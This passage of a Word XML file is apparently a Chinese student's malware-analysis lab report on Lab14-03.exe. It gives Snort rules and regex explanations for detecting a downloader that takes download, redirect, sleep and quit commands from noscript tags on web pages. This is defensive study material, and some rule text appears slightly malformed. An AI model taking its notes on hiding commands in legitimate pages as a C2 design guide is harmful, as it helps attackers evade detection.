              <w:t>EXTERNAL_NET SHTTP_PORTS(msg:"PM14.3.1 Specific</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>User-Agent with duplicate header"; content:"User-Agent|3a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|User-Agent|3a20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">| </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Mozilla/4.0|20|(compatible\;|20|MSIE|20|7.0\;|20|Windows|20|NT)20|5.1\;|20|.NET|20|CLR|20|3.0.4506.2152\;|20].NET|20|CLR|20|3.5.30729)";http_header;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>sid:20001431; rev:1;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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网页中提供命令的总体情况如下：</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eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsiaTheme="minorEastAsia"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&lt;n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>oscript</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>... truncated_url/cmd_chor../arg96</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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恶意代码搜索网页中的一些静态元素，包括noscript标签、URL中第一个字符集(http://),以及末尾的96'。因为读cmd_char结构的解析函数在代码的不同部分，并且可能单独改变，所以应该有针对性地将它们分开。因此，下面是将恶意代码期望的静态元素作为检测目标的特征：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4384675" cy="1140460"/>
            <wp:effectExtent l="0" t="0" r="4445" b="2540"/>
            <wp:docPr id="10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0"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91">
                      <a:lum bright="6000" contrast="6000"/>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4384675" cy="1140460"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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download和redirect函数使用相同的例程来解码URL,因此将这两条命令一起作为检测目标：</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sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">alert tcp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">EXTERNAL_NET </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP_PORTS-&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HOME_NET any(msg:"PM14.3.3 Download</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>or Redirect Command"; content:"/08202016370000";pcre:"</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>/\</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/[dr][^</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>\/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>]*</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>\/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>08202016370000/";sid:20001433; rev:1;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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上述特征使用了字符串08202016370000,之前已经确定它是http://的编码表示形式。PCRE规则选项包括这个字符串和斜线，并且d和r表示download和redirect命令。\/是转义的斜线，[dr]表示字符d或r,[^\ /]*表示与0或者更多个非斜线字符匹配，\/是另一个斜线。</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quit命令本身有一个已知的字符，所以它自身不足以作为检测目标。因此，需要作为检测目标的最后一条命令是sleep,可以使用如下的特征检测到它：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="5"/>
        <w:tblW w:w="9538"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538"/>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9538" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F6F7"/>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">alert tcp </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">EXTERNAL_NET </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP_PORTS -&gt; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>$</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>HOME_NET any (msg:"PM14.3.4 Sleep</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="120" w:after="120" w:line="288" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Command"; content:"96'"; pcre:"/\/s[^\/]{0,15}</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>\/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>[0-9]{2,20}96'/";sid:20001434;rev:1;)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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因为没有固定内容表达式的检测目标提供了足够的处理性能，所以使用命令字符串本身之外的一个元素(96'),来实现一个高效的特征。PCRE识别s后面的一个斜线，紧接着是0~15不是斜线的字符('[^\/]{0,15}),随后又是斜线，然后，是数字2和数字20之间的数字，最后以96'结束。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind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匹配正则表达式字符个数的上限和下限并没有被恶意代码接受的内容所驱使。相反，它们由攻击者合理预期的目标和与无边界正则表达式相关的成本之间的权衡来决定。所以虽然恶意代码确实可能接受大于20个数字的sleep值，但是攻击者发送这样的值会让人怀疑，原因是它将sleep超过3万亿年。假设攻击者继续选择以s开头的单词(s开头的15个字符组组成的一个单词),为了防止被作为特征，攻击者会增加这个单词的值(s后面的数值)。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind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问题：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="750" w:leftChars="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这个实验建立在Lab 14-1之上。想象一下，攻击者尝试使用这个恶意代码来提高他的技术。分析文件Lab14-03.exe中找到的恶意代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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在初始信令中硬编码元素是什么?什么元素能够用于创建一个好的网络特征?</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硬编码的头部包括Accept、Accept-Language、UA-CPU、Accept-Encoding和User-Agent。恶意代码错误地添加了一个额外的User-Agent,在实际的User-Agent中，会导致重复字符串：User-Agent:User-Agent:Mozilla.针对完整的User-Agent头部(包括重复字符串),可以构造一个有效的检测特征。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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初始信令中的什么元素可能不利于可持久使用的网络特征?</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当且仅当配置文件不可用时，域名和URL路径都会采用硬编码。这个硬编码的URL应该与所有配置文件一起构造特征。然而，以硬编码组件为检测目标，比结合硬编码组件与动态URL链接，检测效果可能会更好。因为使用的URL存储在配置文件中，并且随着命令而改变，所以它是临时的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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恶意代码是如何获得命令的?本章中的什么例子用了类似的方法?这种技术的优点是什么?</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从Web页面上noscript标签中的某些特定组件来获得命令，这与本章中提到的注释域例子类似。使用这种技术，恶意代码可以向一个合法的网页发出信令，并且接收合法内容，这使防御者区分恶意流量与合法流量变得更加困难。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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当恶意代码接收到输入时，在输入上执行什么检查可以决定它是否是一个有用的命令?攻击者如何隐藏恶意代码正在寻找的命令列表?</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要将内容解析为命令，必须包含被完整URL(包括http://)跟随的初始noscript标签，此URL包含的域名与原始网页请求的域名相同。此URL路径必须以96'结尾。域名和96(其中被截断)之间的两部分组成了命令和参数(如/command/1213141516类似的形式)。命令的第一个字母必须与提供命令相对应，在合适的时候，参数必须翻译成给定的命令中有意义的参数。</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编写者限制了可以提供有关恶意代码功能线索的字符串列表。当搜索noscript标签时，恶意代码搜索了&lt;no,接着用独立不规则的字符比较操作来确定noscript标签。恶意代码也复用了域名所使用的缓冲区，来检查命令的内容。此外对96'的字符串搜索只有三个字符，另外唯一的单字符串搜索是字符/。当匹配命令时，仅仅考虑第一个字符，所以攻击者可能会在Web响应中提供soft或者seller,而实际上给恶意代码下达的是休眠的命令。流量分析可能确认攻击者在使用单词soft发送一个命令给恶意代码，而这可能会误导分析者在特征中使用完整单词。攻击者在不修改恶意代码的情况下，就可以无限制地使用seller或者任意以s开头的单词。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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什么类型的编码用于命令参数?它与Base64编码有什么不同?它提供的优点和缺点各是什么?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>sleep命令没有编码，而数字表示休眠的秒数。在其中的两条命令中，参数使用的是自定义编码，虽然简单但不是Base64编码。参数由偶数个数字来进行表示(一旦尾部的96被删除)。每组两个数字代表的原始数字是数组/abcdefghijklmnopqrstuvwxyz0123456789:.的索引。这些参数仅用于URL间的通信，所以没有必要用到大写字符。这种编码方案的好处是：它不是标准算法，所以要理解它的内容，需要逆向工程分析它。缺点是很简单：在字符串输出中它可能被识别为可疑，因为URL总是以相同方式开头，这是一个一致性的模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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这个恶意代码会接收哪些命令?</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命令包括quit、download、sleep和redirect。quit命令就是简单退出程序。download命令是下载并且运行可执行文件，不过与以前的实验不同，这里攻击者可以指定URL下载。redirect命令修改了恶意代码使用的配置文件，因此导致了一个新的信令URL。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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这个恶意代码的目的是什么?</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这个恶意代码本质上就是一个下载器。它有一些重要的优点，例如基于Web的控制，在确认为恶意域名并关闭后很容易做出调整。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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本章介绍了用独立的特征，来针对不同位置代码的想法，以增加网络特征的鲁棒性。那么在这个恶意代码中，可以针对哪些区段的代码，或是配置文件，来提取网络特征?</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恶意代码行为中某些特殊元素可能作为独立的检测目标，如下所示：</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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>与静态定义的域名和路径，以及动态发现的URL中相似信息有关的特征。</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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>与信令中静态组件有关的特征。</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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>能够识别命令初始请求的特征。</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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>能够识别命令与参数对特定属性的特征。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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什么样的网络特征集应该被用于检测恶意代码?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:widowControl/>
        <w:numPr>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请参见详细分析过程。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>实验结论及心得体会</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过实验，深入了解了分析恶意代码的方法，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网络特征分析和静态代码分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>动态分析等</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。Wireshark的使用能够捕获并分析网络流量，从中识别出恶意代码的通信模式和特征。静态分析工具IDA Pro则帮助深入理解恶意代码的内部结构和功能，包括使用的网络库和调用的函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。通过动态分析，能够观察到恶意代码在运行时的行为，包括网络通信、文件操作等。这有助于深入理解恶意代码的功能和设计，为制定相应的安全策略提供基础。通过网络特征分析，可以了解恶意代码的通信模式和与控制服务器的交互方式，对于实时检测和响应网络威胁非常关键。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>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lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>恶意代码使用了HTTP协议进行通信，利用了WinINet库。了解这一点有助于防御者制定网络防护策略，监控恶意流量，并采取相应的封锁和检测措施。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
